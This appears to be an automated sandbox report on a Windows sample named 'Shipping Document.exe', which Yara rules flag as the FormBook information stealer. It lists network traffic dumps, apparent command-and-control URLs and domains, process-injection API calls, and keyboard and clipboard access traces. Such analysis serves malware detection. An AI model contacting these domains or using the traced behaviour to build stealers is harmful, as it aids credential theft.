6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 27 May 2024 10:22:47 GMTserver: Apache / ZoneOSlast-modified: Mon, 06 Nov 2023 23:06:18 GMTetag: "1d7b-60983e6d29793"accept-ranges: bytescontent-length: 7547connection: closecontent-type: text/htmlData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 38 32 45 32 33 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 3e 2e 63 75 72 72 65 6e 74 2d 75 72 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 34 45 34 45 34 45 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 3a 20 23 39 35 39 35 39 35 3b 0a 0a 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 32 35 72 65 6d 3b 0a 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 33 43 33 43 43 3b 0a 20 20 20 20 2d 2d 70 72 69 6d 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 46 43 46 43 46 43 3b 0a 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 43 46 43 46 43 3b 0a 20 20 20 20 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 62 74 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 0a 20 20 20 20 2d 2d 6d 61 69 6e 2d 69 63 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 43 33 43 33 43 43 3b 0a 7d 0a 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.y94hr.top
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.y94hr.top/opfh/
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fasthosts.co.uk/
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033jv
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: certreq.exe, 00000004.00000002.3981081238.000000000348B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: certreq.exe, 00000004.00000003.1862123042.0000000008655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
Source: certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
Source: certreq.exe, 00000004.00000002.3986547187.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003796000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_
Source: certreq.exe, 00000004.00000002.3986547187.000000000656C000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003C4C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fruitique.co.uk/opfh/?R40L6=gmtcV0/XP16HFJIc
Source: certreq.exe, 00000004.00000002.3986547187.00000000063DA000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000066FE000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000071FC000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000006D46000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.00000000048DC000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004426000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003DDE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0103425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_0103425A

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01034458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_01034458

Source: C:\Users\user\Desktop\Shipping Document.exe

1_2_0103425A

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_01020219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_01020219

Source: C:\Users\user\Desktop\Shipping Document.exe

Code function: 1_2_0104CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

1_2_0104CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3987001681.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3977610628.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.3984522245.0000000005800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Shipping Document.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00FC3B4C
Source: Shipping Document.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Shipping Document.exe, 00000001.00000000.1497721067.0000000001075000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6d85c0d4-d
Source: Shipping Document.exe, 00000001.00000000.1497721067.0000000001075000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b523132b-3
Source: Shipping Document.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_170db0d5-2
Source: Shipping Document.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4feae052-c

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Shipping Document.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042ACA3 NtClose,	2_2_0042ACA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B60 NtClose,LdrInitializeThunk,	2_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,	2_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074340 NtSetContextThread,	2_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03074650 NtSuspendThread,	2_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072B80 NtQueryInformationFile,	2_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BA0 NtEnumerateValueKey,	2_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BE0 NtQueryValueKey,	2_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072BF0 NtAllocateVirtualMemory,	2_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AB0 NtWaitForSingleObject,	2_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AD0 NtReadFile,	2_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072AF0 NtWriteFile,	2_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F30 NtCreateSection,	2_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F60 NtCreateProcessEx,	2_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072F90 NtProtectVirtualMemory,	2_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FA0 NtQuerySection,	2_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FB0 NtResumeThread,	2_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072FE0 NtCreateFile,	2_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E30 NtWriteVirtualMemory,	2_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072E80 NtReadVirtualMemory,	2_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EA0 NtAdjustPrivilegesToken,	2_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072EE0 NtQueueApcThread,	2_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D00 NtSetInformationFile,	2_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D10 NtMapViewOfSection,	2_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072D30 NtUnmapViewOfSection,	2_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DB0 NtEnumerateKey,	2_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072DD0 NtDelayExecution,	2_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C00 NtQueryInformationProcess,	2_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C60 NtCreateKey,	2_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072C70 NtFreeVirtualMemory,	2_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CA0 NtQueryInformationToken,	2_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CC0 NtQueryVirtualMemory,	2_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072CF0 NtOpenProcess,	2_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073010 NtOpenDirectoryObject,	2_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073090 NtSetValueKey,	2_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030739B0 NtGetContextThread,	2_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03073D10 NtOpenProcessToken,	2_2_03073D10
